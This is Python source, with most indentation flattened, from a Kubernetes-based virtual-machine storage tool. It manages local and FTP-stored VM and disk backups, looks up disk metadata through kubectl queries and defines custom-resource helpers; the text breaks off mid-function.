disk_backup_dir = '%s/%s/diskbackup' % (backup_dir, full_version)
checksum_file = '%s/checksum.json' % disk_backup_dir
if os.path.exists(checksum_file):
with open(checksum_file, 'r') as f:
checksums = load(f)
for checksum in checksum_to_deletes:
file_path = '%s/%s' % (disk_backup_dir, checksums[checksum])
runCmd('rm -f %s' % file_path)
del checksums[checksum]
with open(checksum_file, 'w') as f:
dump(checksums, f)
with open(history_file, 'r') as f:
history = load(f)
del history[full_version][version]
if len(list(history[full_version].keys())) == 0:
del history[full_version]
runCmd('rm -rf %s/%s' % (backup_dir, full_version))
if len(list(history.keys())) == 0 or (len(list(history.keys())) == 1 and 'current' in list(history.keys())):
runCmd('rm -rf %s' % backup_dir)
else:
with open(history_file, 'w') as f:
dump(history, f)
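# Delete a VM-level backup version: drop every per-disk backup it references, the saved
# domain XML and, when nothing is left, the history file itself.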
def delete_vm_backup(domain, pool, version):
# default backup path
pool_info = get_pool_info_from_k8s(pool)
check_pool_active(pool_info)
if not os.path.exists(pool_info['path']):
raise ExecuteException('', 'pool %s path %s not exist. plz check it.' % (pool, pool_info['path']))
backup_dir = '%s/vmbackup/%s' % (pool_info['path'], domain)
history_file_path = '%s/history.json' % backup_dir
if not is_vm_backup_exist(domain, pool, version):
return
# raise ExecuteException('', 'domain %s not exist backup version %s in %s. plz check it.' % (
# domain, version, history_file_path))
disk_version = {}
with open(history_file_path, 'r') as f:
history = load(f)
record = history[version]
for disk in list(record.keys()):
disk_version[disk] = record[disk]['version']
for disk in list(disk_version.keys()):
delete_disk_backup(domain, pool, disk, disk_version[disk])
try:
op = Operation('rm -f %s/%s.xml' % (backup_dir, version), {})
op.execute()
except:
pass
del history[version]
if len(list(history.keys())) == 0:
runCmd("rm -f %s" % history_file_path)
else:
with open(history_file_path, 'w') as f:
dump(history, f)
def deleteVMBackup(params):
# pool_heler = K8sHelper('VirtualMachinePool')
# pool_heler.delete_lifecycle(params.pool)
delete_vm_backup(params.domain, params.pool, params.version)
try:
backup_helper = K8sHelper('VirtualMachineBackup')
backup_helper.delete(params.version)
except:
pass
success_print("success deleteVMBackup.", {})
def deleteVMDiskBackup(params):
# pool_heler = K8sHelper('VirtualMachinePool')
# pool_heler.delete_lifecycle(params.pool)
delete_disk_backup(params.domain, params.pool, params.vol, params.version)
try:
backup_helper = K8sHelper('VirtualMachineBackup')
backup_helper.delete(params.version)
except:
pass
success_print("success deleteVMDiskBackup.", {})
def deleteRemoteBackup(params):
# pool_heler = K8sHelper('VirtualMachinePool')
# pool_heler.delete_lifecycle(params.pool)
# default backup path
if params.vol:
delete_remote_disk_backup(params.domain, params.vol, params.version, params.remote, params.port,
params.username, params.password)
else:
delete_remote_vm_backup(params.domain, params.version, params.remote, params.port, params.username,
params.password)
success_print("success deleteRemoteBackup.", {})
def delete_remote_disk_backup(domain, disk, version, remote, port, username, password):
if not remote or not port or not username or not password:
raise ExecuteException('', 'ftp port, username, password must be set.')
ftp = FtpHelper(remote, port, username, password)
backup_dir = '/vmbackup/%s/diskbackup/%s' % (domain, disk)
history_file = '%s/history.json' % backup_dir
logger.debug('history_file: ' + history_file)
if not ftp.is_exist_file(history_file):
return
# raise ExecuteException('',
# 'can not find disk %s backup record %s in ftp server' % (disk, version))
history = ftp.get_json_file_data(history_file)
full_version = get_full_version_by_history(disk, version, history)
if full_version not in list(history.keys()) or version not in list(history[full_version].keys()):
return
# raise ExecuteException('',
# 'can not find disk %s backup record %s in ftp server' % (disk, version))
record = history[full_version][version]
chains = record['chains']
checksum_to_deletes = []
for chain in chains:
checksum_to_deletes.append(chain['checksum'])
for v in list(history[full_version].keys()):
if v == version:
continue
chains = history[full_version][v]['chains']
for chain in chains:
if chain['checksum'] in checksum_to_deletes:
checksum_to_deletes.remove(chain['checksum'])
disk_backup_dir = '%s/%s/diskbackup' % (backup_dir, full_version)
checksum_file = '%s/checksum.json' % disk_backup_dir
checksums = ftp.get_json_file_data(checksum_file)
logger.debug(checksums)
logger.debug(checksum_to_deletes)
for checksum in checksum_to_deletes:
file_path = '%s/%s' % (disk_backup_dir, checksums[checksum])
ftp.delete_file(file_path)
del checksums[checksum]
tmp_file = '/tmp/checksum.json'
with open(tmp_file, 'w') as f:
dump(checksums, f)
ftp.upload_file(tmp_file, disk_backup_dir)
del history[full_version][version]
if len(list(history[full_version].keys())) == 0:
del history[full_version]
ftp.delete_dir('%s/%s' % (backup_dir, full_version))
if len(list(history.keys())) == 0 or (len(list(history.keys())) == 1 and 'current' in list(history.keys())):
ftp.delete_dir(backup_dir)
else:
tmp_file = '/tmp/history.json'
with open(tmp_file, 'w') as f:
dump(history, f)
ftp.upload_file(tmp_file, backup_dir)
def delete_remote_vm_backup(domain, version, remote, port, username, password):
ftp = FtpHelper(remote, port, username, password)
history_file = '/vmbackup/%s/history.json' % domain
history = ftp.get_json_file_data(history_file)
if not history or version not in list(history.keys()):
return
# raise ExecuteException('', 'not exist vm %s backup record version %s in %s. ' % (
# domain, version, history_file))
record = history[version]
for disk in list(record.keys()):
if disk == 'current':
continue
delete_remote_disk_backup(domain, disk, record[disk]['version'], remote, port,
username, password)
history_file = '/vmbackup/%s/history.json' % domain
history = ftp.get_json_file_data(history_file)
del history[version]
if len(list(history.keys())) == 0:
ftp.delete_file(history_file)
else:
tmp_file = '/tmp/history.json'
with open(tmp_file, 'w') as f:
dump(history, f)
ftp.upload_file(tmp_file, '/vmbackup/%s' % domain)
ftp.delete_file('/vmbackup/%s/%s.xml' % (domain, version))
def pushVMBackup(params):
# pool_heler = K8sHelper('VirtualMachinePool')
# pool_heler.delete_lifecycle(params.pool)
pool_info = get_pool_info_from_k8s(params.pool)
check_pool_active(pool_info)
if not os.path.exists(pool_info['path']):
raise ExecuteException('', 'pool %s path %s not exist. plz check it.' % (params.pool, pool_info['path']))
backup_dir = '%s/vmbackup/%s' % (pool_info['path'], params.domain)
# if is_remote_vm_backup_exist(params.domain, params.version, params.remote, params.port, params.username, params.password):
# raise ExecuteException('', 'domain %s has exist backup version %s in ftp server. plz check it.' % (
# params.domain, params.version))
# history file
history_file = '%s/history.json' % backup_dir
with open(history_file, 'r') as f:
history = load(f)
ftp = FtpHelper(params.remote, params.port, params.username, params.password)
ftp_history_file = '/vmbackup/%s/history.json' % params.domain
if ftp.is_exist_file(ftp_history_file):
ftp_history = ftp.get_json_file_data(ftp_history_file)
else:
ftp_history = {}
# upload file
if params.vol:
push_disk_backup(params.domain, params.pool, params.vol, params.version, params.remote,
params.port, params.username, params.password)
else:
fin = []
record = history[params.version]
try:
for disk in list(record.keys()):
push_disk_backup(params.domain, params.pool, disk, record[disk]['version'], params.remote,
params.port, params.username, params.password)
fin.append(disk)
except:
for disk in fin:
delete_remote_disk_backup(params.domain, disk, record[disk]['version'], params.remote, params.port,
params.username, params.password)
raise ExecuteException('', 'can not upload backup record to ftp server.')
ftp.upload_file('%s/%s.xml' % (backup_dir, params.version), '/vmbackup/%s' % params.domain)
ftp_history[params.version] = history[params.version]
with open('/tmp/history.json', 'w') as f:
dump(ftp_history, f)
ftp.upload_file("/tmp/history.json", '/vmbackup/%s' % params.domain)
success_print("success pushVMBackup.", {})
# def pushVMDiskBackup(params):
# vm_heler = K8sHelper('VirtualMachine')
# vm_heler.delete_lifecycle(params.domain)
#
# push_disk_backup(params.domain, params.pool, params.vol, params.version, params.remote, params.port, params.username, params.password)
# success_print("success pushVMDiskBackup.", {})
def push_disk_backup(domain, pool, disk, version, remote, port, username, password):
    if not remote or not port or not username or not password:
raise ExecuteException('', 'ftp port, username, password must be set.')
ftp = FtpHelper(remote, port, username, password)
# if is_remote_disk_backup_exist(domain, disk, version, remote, port, username, password):
# raise ExecuteException('', 'ftp server has exist vm %s backup record version %s. ' % (
# domain, version))
pool_info = get_pool_info_from_k8s(pool)
check_pool_active(pool_info)
disk_backup_dir = '%s/vmbackup/%s/diskbackup/%s' % (pool_info['path'], domain, disk)
if not os.path.exists(disk_backup_dir):
os.makedirs(disk_backup_dir)
history_file = '%s/history.json' % disk_backup_dir
if not os.path.exists(history_file) or not is_disk_backup_exist(domain, pool, disk, version):
raise ExecuteException('', 'not exist vm %s backup record version %s in %s. ' % (
domain, version, history_file))
full_version = None
record = None
with open(history_file, 'r') as f:
history = load(f)
for fv in list(history.keys()):
if fv == 'current':
continue
for v in list(history[fv].keys()):
if v == version:
full_version = fv
record = history[fv][version]
if full_version is None or record is None:
raise ExecuteException('', 'can not get domain %s right backup record version %s in %s. ' % (
domain, version, history_file))
remote_disk_dir = '/vmbackup/%s/diskbackup/%s' % (domain, disk)
# history file
ftp_history_file = '%s/history.json' % remote_disk_dir
if ftp.is_exist_file(ftp_history_file):
ftp.download_file(ftp_history_file, '/tmp/history.json')
with open('/tmp/history.json', 'r') as f:
ftp_history = load(f)
if full_version not in ftp_history:
ftp_history[full_version] = {}
ftp_history[full_version][version] = record
else:
ftp_history = {}
ftp_history[full_version] = {}
ftp_history[full_version][version] = record
with open('/tmp/history.json', 'w') as f:
dump(ftp_history, f)
ftp.upload_file('/tmp/history.json', remote_disk_dir)
# modify checksum file
ftp_checksum_file = '%s/%s/diskbackup/checksum.json' % (remote_disk_dir, full_version)
local_checksum_file = '%s/%s/diskbackup/checksum.json' % (disk_backup_dir, full_version)
if ftp.is_exist_file(ftp_checksum_file):
ftp.download_file(ftp_checksum_file, '/tmp/checksum.json')
with open(local_checksum_file, 'r') as f1:
local_checksum = load(f1)
with open('/tmp/checksum.json', 'r') as f:
remote_checksum = load(f)
else:
with open(local_checksum_file, 'r') as f1:
local_checksum = load(f1)
remote_checksum = {}
    for chain in record['chains']:
        if chain['checksum'] not in list(remote_checksum.keys()):
            remote_checksum[chain['checksum']] = local_checksum[chain['checksum']]
            # upload disk file
            backup_file = '%s/%s/diskbackup/%s' % (
                disk_backup_dir, full_version, local_checksum[chain['checksum']])
            ftp.upload_file(backup_file, '%s/%s/diskbackup' % (remote_disk_dir, full_version))
with open('/tmp/checksum.json', 'w') as f:
dump(remote_checksum, f)
ftp.upload_file('/tmp/checksum.json', '%s/%s/diskbackup' % (remote_disk_dir, full_version))
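# CLI entry: download a backup from the FTP server into the local backup pool, either a
# single disk version (params.vol) or a whole VM backup record.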
def pullRemoteBackup(params):
# pool_heler = K8sHelper('VirtualMachinePool')
# pool_heler.delete_lifecycle(params.pool)
# default backup path
checksum_to_pull = []
pool_info = get_pool_info_from_k8s(params.pool)
check_pool_active(pool_info)
if not os.path.exists(pool_info['path']):
raise ExecuteException('', 'can not find pool path %s' % pool_info['path'])
backup_dir = '%s/vmbackup/%s' % (pool_info['path'], params.domain)
if not os.path.exists(backup_dir):
os.makedirs(backup_dir)
if params.vol:
pull_disk_backup(params.domain, params.pool, params.vol, params.version, params.remote, params.port,
params.username, params.password)
else:
if not is_remote_vm_backup_exist(params.domain, params.version, params.remote, params.port, params.username,
params.password):
raise ExecuteException('', 'can not find vm backup record %s in ftp server %s.' % (
params.version, params.remote))
ftp = FtpHelper(params.remote, params.port, params.username, params.password)
ftp_history_file = '/vmbackup/%s/history.json' % params.domain
ftp_history = ftp.get_json_file_data(ftp_history_file)
record = ftp_history[params.version]
fin = []
try:
for disk in list(record.keys()):
pull_disk_backup(params.domain, params.pool, disk, record[disk]['version'], params.remote, params.port,
params.username, params.password)
fin.append(disk)
ftp.download_file('/vmbackup/%s/%s.xml' % (params.domain, params.version),
'%s/%s.xml' % (backup_dir, params.version))
except ExecuteException as e:
for disk in fin:
delete_disk_backup(params.domain, params.pool, disk, record[disk]['version'])
raise e
history_file = '%s/history.json' % backup_dir
if os.path.exists(history_file):
with open(history_file, 'r') as f:
history = load(f)
else:
history = {}
history[params.version] = record
with open(history_file, 'w') as f:
dump(history, f)
success_print("success pullRemoteBackup.", {})
def pull_disk_backup(domain, pool, disk, version, remote, port, username, password):
# default backup path
ftp = FtpHelper(remote, port, username, password)
remote_backup_dir = '/vmbackup/%s/diskbackup/%s' % (domain, disk)
remote_history_file = '%s/history.json' % remote_backup_dir
remote_history = ftp.get_json_file_data(remote_history_file)
full_version = get_full_version_by_history(disk, version, remote_history)
    if full_version not in list(remote_history.keys()) or version not in list(remote_history[full_version].keys()):
raise ExecuteException('',
'can not find disk %s backup record %s in ftp server' % (disk, version))
pool_info = get_pool_info_from_k8s(pool)
check_pool_active(pool_info)
if not os.path.exists(pool_info['path']):
raise ExecuteException('', 'can not find pool path %s' % pool_info['path'])
backup_dir = '%s/vmbackup/%s/diskbackup/%s' % (pool_info['path'], domain, disk)
if not os.path.exists(backup_dir):
os.makedirs(backup_dir)
history_file = '%s/history.json' % backup_dir
if not os.path.exists('%s/%s/diskbackup' % (backup_dir, full_version)):
os.makedirs('%s/%s/diskbackup' % (backup_dir, full_version))
if os.path.exists(history_file):
with open(history_file, 'r') as f:
history = load(f)
if full_version in list(history.keys()) and version in list(history[full_version].keys()):
raise ExecuteException('', 'disk backup %s has exist in pool %s .' % (version, pool))
else:
history = {}
remote_checksum = ftp.get_json_file_data('%s/%s/diskbackup/checksum.json' % (remote_backup_dir, full_version))
record = remote_history[full_version][version]
chains = record['chains']
for chain in chains:
df = '%s/%s/diskbackup/%s' % (remote_backup_dir, full_version, remote_checksum[chain['checksum']])
ftp.download_file(df, '%s/%s/diskbackup/%s' % (backup_dir, full_version, remote_checksum[chain['checksum']]))
if full_version not in list(history.keys()):
history[full_version] = {}
history[full_version][version] = record
with open(history_file, 'w') as f:
dump(history, f)
local_checksum_file = '%s/%s/diskbackup/checksum.json' % (backup_dir, full_version)
if os.path.exists(local_checksum_file):
with open(local_checksum_file, 'r') as f:
local_checksum = load(f)
else:
local_checksum = {}
for chain in chains:
local_checksum[chain['checksum']] = remote_checksum[chain['checksum']]
with open(local_checksum_file, 'w') as f:
dump(local_checksum, f)
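# Reconcile local disk backups against the given version list: versions not in the list
# are deleted from disk, and VirtualMachineBackup objects are removed for listed versions
# that no longer exist locally.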
def clean_disk_backup(domain, pool, disk, versions):
# check backup pool path exist or not
pool_info = get_pool_info_from_k8s(pool)
check_pool_active(pool_info)
if not os.path.exists(pool_info['path']):
raise ExecuteException('', 'pool %s path %s not exist. plz check it.' % (pool, pool_info['path']))
disk_backup_dir = '%s/vmbackup/%s/diskbackup/%s' % (pool_info['path'], domain, disk)
if not os.path.exists(disk_backup_dir):
return
# check backup version exist or not
history_file_path = '%s/history.json' % disk_backup_dir
backup_helper = K8sHelper('VirtualMachineBackup')
for version in versions:
if not is_disk_backup_exist(domain, pool, disk, version):
try:
backup_helper.delete(version)
except:
pass
disk_versions = get_disk_backup_version(domain, pool, disk)
for version in disk_versions:
if version not in versions:
delete_disk_backup(domain, pool, disk, version)
try:
backup_helper.delete(version)
except:
pass
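# Same reconciliation as clean_disk_backup, but at the whole-VM backup level.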
def clean_vm_backup(domain, pool, versions):
# check backup pool path exist or not
pool_info = get_pool_info_from_k8s(pool)
check_pool_active(pool_info)
logger.debug('check_pool_active')
if not os.path.exists(pool_info['path']):
raise ExecuteException('', 'pool %s path %s not exist. plz check it.' % (pool, pool_info['path']))
backup_dir = '%s/vmbackup/%s' % (pool_info['path'], domain)
if not os.path.exists(backup_dir):
return
# check backup version exist or not
backup_helper = K8sHelper('VirtualMachineBackup')
history_file = '%s/history.json' % backup_dir
if not os.path.exists(history_file):
return
with open(history_file, 'r') as f:
history = load(f)
for v in list(history.keys()):
if v not in versions:
delete_vm_backup(domain, pool, v)
try:
backup_helper.delete(v)
except:
pass
for v in versions:
if v not in list(history.keys()):
try:
backup_helper.delete(v)
except:
pass
def cleanBackup(params):
# pool_heler = K8sHelper('VirtualMachinePool')
# pool_heler.delete_lifecycle(params.pool)
versions = []
if params.version:
for v in params.version.split(','):
versions.append(v.strip())
logger.debug('versions')
logger.debug(versions)
if params.vol:
clean_disk_backup(params.domain, params.pool, params.vol, versions)
else:
clean_vm_backup(params.domain, params.pool, versions)
success_print("success cleanBackup", {})
def clean_disk_remote_backup(domain, disk, versions, remote, port, username, password):
backup_helper = K8sHelper('VirtualMachineBackup')
for version in versions:
if not is_remote_disk_backup_exist(domain, disk, version, remote, port, username, password):
# try:
# backup_helper.delete(version)
# except:
# pass
pass
disk_versions = get_remote_disk_backup_version(domain, disk, remote, port, username, password)
for version in disk_versions:
if version not in versions:
delete_remote_disk_backup(domain, disk, version, remote, port, username, password)
# try:
# backup_helper.delete(version)
# except:
# pass
pass
def clean_vm_remote_backup(domain, versions, remote, port, username, password):
ftp = FtpHelper(remote, port, username, password)
remote_backup_dir = '/vmbackup/%s' % domain
remote_history_file = '%s/history.json' % remote_backup_dir
remote_history = ftp.get_json_file_data(remote_history_file)
if remote_history is None:
remote_history = {}
for v in list(remote_history.keys()):
if v not in versions:
delete_remote_vm_backup(domain, v, remote, port, username, password)
def cleanRemoteBackup(params):
# pool_heler = K8sHelper('VirtualMachinePool')
# pool_heler.delete_lifecycle(params.pool)
versions = []
if params.version:
for v in params.version.split(','):
versions.append(v.strip())
if params.vol:
clean_disk_remote_backup(params.domain, params.vol, versions, params.remote, params.port, params.username,
params.password)
else:
clean_vm_remote_backup(params.domain, versions, params.remote, params.port, params.username, params.password)
success_print("success cleanRemoteBackup", {})
def scanBackup(params):
# pool_heler = K8sHelper('VirtualMachinePool')
# pool_heler.delete_lifecycle(params.pool)
# check backup pool path exist or not
pool_info = get_pool_info_from_k8s(params.pool)
check_pool_active(pool_info)
if not os.path.exists(pool_info['path']):
raise ExecuteException('', 'pool %s path %s not exist. plz check it.' % (params.pool, pool_info['path']))
backup_helper = K8sHelper('VirtualMachineBackup')
if params.vol:
backup_dir = '%s/vmbackup/%s/diskbackup/%s' % (pool_info['path'], params.domain, params.vol)
if not os.path.exists(backup_dir):
success_print("success scanBackup", {})
return
# check backup version exist or not
history_file = '%s/history.json' % backup_dir
with open(history_file, 'r') as f:
history = load(f)
disk_full_versions = get_disk_backup_full_version(params.domain, params.pool, params.vol)
for fv in disk_full_versions:
for v in list(history[fv].keys()):
if not backup_helper.exist(v):
data = {
'domain': params.domain,
'disk': params.vol,
'pool': params.pool,
'full': fv,
'time': history[fv][v]['time'],
'version': v
}
backup_helper.create(v, 'backup', data)
backup_helper.add_label(v, params.domain)
else:
backup_dir = '%s/vmbackup/%s' % (pool_info['path'], params.domain)
if not os.path.exists(backup_dir):
success_print("success scanBackup", {})
return
# check backup version exist or not
history_file = '%s/history.json' % backup_dir
with open(history_file, 'r') as f:
history = load(f)
for v in list(history.keys()):
if not backup_helper.exist(v):
time = ''
vm_full = ''
for disk in list(history[v].keys()):
time = history[v][disk]['time']
vm_full = history[v][disk]['vm_full']
data = {
'domain': params.domain,
'disk': '',
'pool': params.pool,
'full': vm_full,
'time': time,
'version': v
}
backup_helper.create(v, 'backup', data)
backup_helper.add_label(v, params.domain)
success_print("success scanBackup", {})
def deleteRemoteBackupServer(params):
logger.debug("delete remote backup server. %s %s" % (params.remote, params.port))
ftp = FtpHelper(params.remote, params.port, params.username, params.password)
dirs = ftp.listdir("/vmbackup")
for dir in dirs:
full_dir = "/vmbackup/%s" % dir
if ftp.is_exist_dir(full_dir):
logger.debug("delete dir %s" % full_dir)
ftp.delete_dir(full_dir)
success_print("success delete remote backup server.", {})
def showDiskPool(params):
prepare_info = get_disk_prepare_info_by_path(params.path)
pool_info = get_pool_info_from_k8s(prepare_info['pool'])
success_print("success show pool info by disk path", pool_info)
def prepare_disk_by_metadataname(uuid):
success = False
output = None
for i in range(30):
try:
output = rpcCallAndGetOutput(
'kubectl get vmd -o=jsonpath="{range .items[?(@.metadata.name==\\"%s\\")]}{.spec.volume.poolname}{\\"\\t\\"}{.spec.volume.disk}{\\"\\t\\"}{.spec.volume.uni}{\\"\\t\\"}{.spec.nodeName}{\\"\\n\\"}{end}"' % uuid)
break
except Exception as e:
pass
if output and len(output.splitlines()) == 1 and len(output.splitlines()[0].split()) == 4:
success = True
if not success:
raise ExecuteException('', 'can not get right disk info from k8s by metadataname.')
lines = output.splitlines()
if len(lines) != 1:
logger.debug(lines)
raise ExecuteException('', 'can not get right disk info from k8s by path.')
columns = lines[0].split()
if len(columns) != 4:
logger.debug(columns)
raise ExecuteException('', 'can not get right disk info from k8s by path. less info')
    pool = columns[0]
    disk = columns[1]
    uni = columns[2]
    nodeName = columns[3]
    # collect the parsed fields so callers get the same shape as get_disk_prepare_info_by_path
    diskinfo = {'poolname': pool, 'disk': disk, 'uni': uni, 'nodeName': nodeName}
# if is_pool_exists(pool):
# pool_info = get_pool_info(pool)
# pool = os.path.basename(pool_info['path'])
disk_prepare(pool, disk, uni)
return diskinfo
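# Map a file path back to the disk that owns it: first through try_fix_disk_metadata and
# the k8s volume record, then by querying the vmd / vmdsn / vmdi custom resources by
# spec.volume.filename.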
def get_disk_prepare_info_by_path(path):
logger.debug('get_disk_prepare_info_by_path: %s' % path)
try:
current = try_fix_disk_metadata(path)
if current:
path = current
except:
logger.debug(traceback.format_exc())
disk = try_get_diskmn_by_path(path)
try:
volume = get_vol_info_from_k8s(disk)
disk_helper = K8sHelper('VirtualMachineDisk')
diskinfo = {}
diskinfo['poolname'] = volume['poolname']
diskinfo['disk'] = disk
diskinfo['uni'] = volume['uni']
jsondict = disk_helper.get(disk)
spec = get_spec(jsondict)
if spec:
nodeName = spec.get('nodeName')
if nodeName:
diskinfo['nodeName'] = nodeName
diskinfo['pool'] = volume['pool']
diskinfo['path'] = volume['current']
return diskinfo
except:
pass
logger.debug('get_disk_prepare_info_by_path: %s' % path)
success = False
for i in range(30):
try:
if not success:
output = rpcCallAndGetOutput(
'kubectl get vmd -o=jsonpath="{range .items[?(@.spec.volume.filename==\\"%s\\")]}{.spec.volume.poolname}{\\"\\t\\"}{.spec.volume.disk}{\\"\\t\\"}{.spec.volume.uni}{\\"\\t\\"}{.spec.nodeName}{\\"\\t\\"}{.spec.volume.pool}{\\"\\n\\"}{end}"' % path)
if output and len(output.splitlines()) == 1 and len(output.splitlines()[0].split()) == 5:
success = True
if not success:
output = rpcCallAndGetOutput(
'kubectl get vmdsn -o=jsonpath="{range .items[?(@.spec.volume.filename==\\"%s\\")]}{.spec.volume.poolname}{\\"\\t\\"}{.spec.volume.disk}{\\"\\t\\"}{.spec.volume.uni}{\\"\\t\\"}{.spec.nodeName}{\\"\\t\\"}{.spec.volume.pool}{\\"\\n\\"}{end}"' % path)
if output and len(output.splitlines()) == 1 and len(output.splitlines()[0].split()) == 5:
success = True
if not success:
output = rpcCallAndGetOutput(
'kubectl get vmdi -o=jsonpath="{range .items[?(@.spec.volume.filename==\\"%s\\")]}{.spec.volume.poolname}{\\"\\t\\"}{.spec.volume.disk}{\\"\\t\\"}{.spec.volume.uni}{\\"\\t\\"}{.spec.nodeName}{\\"\\t\\"}{.spec.volume.pool}{\\"\\n\\"}{end}"' % path)
if output and len(output.splitlines()) == 1 and len(output.splitlines()[0].split()) == 5:
success = True
break
except Exception:
logger.debug(traceback.format_exc())
if not success:
raise ExecuteException('', 'can not get right disk info from k8s by path: %s. less info' % path)
lines = output.splitlines()
columns = lines[0].split()
if len(columns) != 5:
logger.debug(columns)
raise ExecuteException('', 'can not get right disk info from k8s by path: %s. less info' % path)
diskinfo = {}
diskinfo['poolname'] = columns[0]
diskinfo['disk'] = columns[1]
diskinfo['uni'] = columns[2]
diskinfo['nodeName'] = columns[3]
diskinfo['pool'] = columns[4]
diskinfo['path'] = path
return diskinfo
def prepare_disk_by_path(path):
diskinfo = get_disk_prepare_info_by_path(path)
pool = diskinfo['poolname']
disk = diskinfo['disk']
uni = diskinfo['uni']
nodeName = diskinfo['nodeName']
disk_prepare(pool, disk, uni)
return diskinfo
def remote_prepare_disk_by_path(ip, path):
diskinfo = get_disk_prepare_info_by_path(path)
pool = diskinfo['poolname']
disk = diskinfo['disk']
uni = diskinfo['uni']
remote_disk_prepare(ip, pool, disk, uni)
return diskinfo
def release_disk_by_metadataname(uuid):
success = False
output = None
for i in range(30):
try:
output = rpcCallAndGetOutput(
'kubectl get vmd -o=jsonpath="{range .items[?(@.metadata.name==\\"%s\\")]}{.spec.volume.poolname}{\\"\\t\\"}{.spec.volume.disk}{\\"\\t\\"}{.spec.volume.uni}{\\"\\t\\"}{.spec.nodeName}{\\"\\n\\"}{end}"' % uuid)
break
except Exception:
logger.debug(traceback.format_exc())
if output and len(output.splitlines()) == 1 and len(output.splitlines()[0].split()) == 4:
success = True
if not success:
raise ExecuteException('', 'can not get right disk info from k8s by metadataname.')
lines = output.splitlines()
if len(lines) != 1:
logger.debug(lines)
raise ExecuteException('', 'can not get right disk info from k8s by path.')
columns = lines[0].split()
if len(columns) != 4:
logger.debug(columns)
raise ExecuteException('', 'can not get right disk info from k8s by path. less info')
pool = columns[0]
disk = columns[1]
uni = columns[2]
def release_disk_by_path(path):
diskinfo = get_disk_prepare_info_by_path(path)
pool = diskinfo['poolname']
disk = diskinfo['disk']
uni = diskinfo['uni']
if __name__ == '__main__':
print(get_node_name_by_node_ip('172.16.1.25'))
# print get_disk_prepare_info_by_path('/var/lib/libvirt/cstor/39829673ec934c2786b7715a96a7d878/39829673ec934c2786b7715a96a7d878/ff8538567f1a4ec8ab0257e5b2ece4b3/30ca01637b444a0c9c9e3c0adcd3e364')
# print get_disks_spec('vm006')
# print get_disk_prepare_info_by_path('/var/lib/libvirt/cstor/1709accf174vccaced76b0dbfccdev/1709accf174vccaced76b0dbfccdev/vm003migratevmdisk2/snapshots/vm003migratevmdisk2.1')
# prepare_disk_by_path(
# '/var/lib/libvirt/cstor/1709accdd174caced76b0dbfccdev/1709accdd174caced76b0dbfccdev/vm00aadd6coddpdssdn/vm00aadd6coddpdssdn')
# prepare_disk_by_metadataname('vm00aadd6coddpdssdn')
# release_disk_by_path('/var/lib/libvirt/cstor/1709accdd174caced76b0dbfccdev/1709accdd174caced76b0dbfccdev/vm00aadd6coddpdssdn/vm00aadd6coddpdssdn')
# release_disk_by_metadataname('vm00aadd6coddpdssdn')
```
#### File: kubeext-SDS-python3/utils/k8s.py
```python
import operator
import socket
from json import dumps
from kubernetes import client, config
import os, sys, configparser
from sys import exit
import logging
import logging.handlers
from kubernetes.client import V1DeleteOptions
from kubernetes.client.rest import ApiException
from utils.exception import ExecuteException
class parser(configparser.ConfigParser):
def __init__(self, defaults=None):
        configparser.ConfigParser.__init__(self, defaults=defaults)
def optionxform(self, optionstr):
return optionstr
cfg = "/etc/kubevmm/config"
if not os.path.exists(cfg):
cfg = "/home/kubevmm/bin/config"
config_raw = parser()
config_raw.read(cfg)
config.load_kube_config(config_file=config_raw.get('Kubernetes', 'token_file'))
LOG = '/var/log/kubesds3.log'
RETRY_TIMES = 30
def set_logger(header, fn):
logger = logging.getLogger(header)
handler1 = logging.StreamHandler()
handler2 = logging.handlers.RotatingFileHandler(filename=fn, maxBytes=10000000, backupCount=10)
logger.setLevel(logging.DEBUG)
handler1.setLevel(logging.ERROR)
handler2.setLevel(logging.DEBUG)
formatter = logging.Formatter("%(asctime)s %(name)s %(lineno)s %(levelname)s %(message)s")
handler1.setFormatter(formatter)
handler2.setFormatter(formatter)
logger.addHandler(handler1)
logger.addHandler(handler2)
return logger
k8s_logger = set_logger(os.path.basename(__file__), LOG)
resources = {}
for kind in ['VirtualMachine', 'VirtualMachinePool', 'VirtualMachineDisk', 'VirtualMachineDiskImage',
'VirtualMachineDiskSnapshot', 'VirtualMachineBackup']:
resource = {}
for key in ['version', 'group', 'plural']:
resource[key] = config_raw.get(kind, key)
resources[kind] = resource
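# Module-level CRUD helpers for the kubevmm custom resources; the K8sHelper class below
# wraps the same calls with retries.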
def get(name, kind):
jsondict = client.CustomObjectsApi().get_namespaced_custom_object(group=resources[kind]['group'],
version=resources[kind]['version'],
namespace='default',
plural=resources[kind]['plural'],
name=name)
return jsondict
def create(name, data, kind):
hostname = get_hostname_in_lower_case()
jsondict = {'spec': {'volume': {}, 'nodeName': hostname, 'status': {}},
'kind': kind, 'metadata': {'labels': {'host': hostname}, 'name': name},
'apiVersion': '%s/%s' % (resources[kind]['group'], resources[kind]['version'])}
jsondict = updateJsonRemoveLifecycle(jsondict, data)
body = addPowerStatusMessage(jsondict, 'Ready', 'The resource is ready.')
return client.CustomObjectsApi().create_namespaced_custom_object(
group=resources[kind]['group'], version=resources[kind]['version'], namespace='default',
plural=resources[kind]['plural'], body=body)
def update(name, data, kind):
return client.CustomObjectsApi().replace_namespaced_custom_object(
group=resources[kind]['group'], version=resources[kind]['version'], namespace='default',
plural=resources[kind]['plural'], name=name, body=data)
def delete(name, data, kind):
k8s_logger.debug('deleteVMBackupdebug %s' % name)
return client.CustomObjectsApi().delete_namespaced_custom_object(
group=resources[kind]['group'], version=resources[kind]['version'], namespace='default',
plural=resources[kind]['plural'], name=name, body=data)
def addPowerStatusMessage(jsondict, reason, message):
if jsondict:
status = {'conditions': {'state': {'waiting': {'message': message, 'reason': reason}}}}
spec = get_spec(jsondict)
if spec:
spec['status'] = status
return jsondict
def get_spec(jsondict):
spec = jsondict.get('spec')
if not spec:
raw_object = jsondict.get('raw_object')
if raw_object:
spec = raw_object.get('spec')
return spec
def deleteLifecycleInJson(jsondict):
if jsondict:
spec = get_spec(jsondict)
if spec:
lifecycle = spec.get('lifecycle')
if lifecycle:
del spec['lifecycle']
return jsondict
def updateJsonRemoveLifecycle(jsondict, body):
if jsondict:
spec = get_spec(jsondict)
if spec:
lifecycle = spec.get('lifecycle')
if lifecycle:
del spec['lifecycle']
spec.update(body)
return jsondict
def hasLifeCycle(jsondict):
if jsondict:
spec = get_spec(jsondict)
if spec:
lifecycle = spec.get('lifecycle')
if lifecycle:
return True
return False
def removeLifecycle(jsondict):
if jsondict:
spec = get_spec(jsondict)
if spec:
lifecycle = spec.get('lifecycle')
if lifecycle:
del spec['lifecycle']
return jsondict
def get_hostname_in_lower_case():
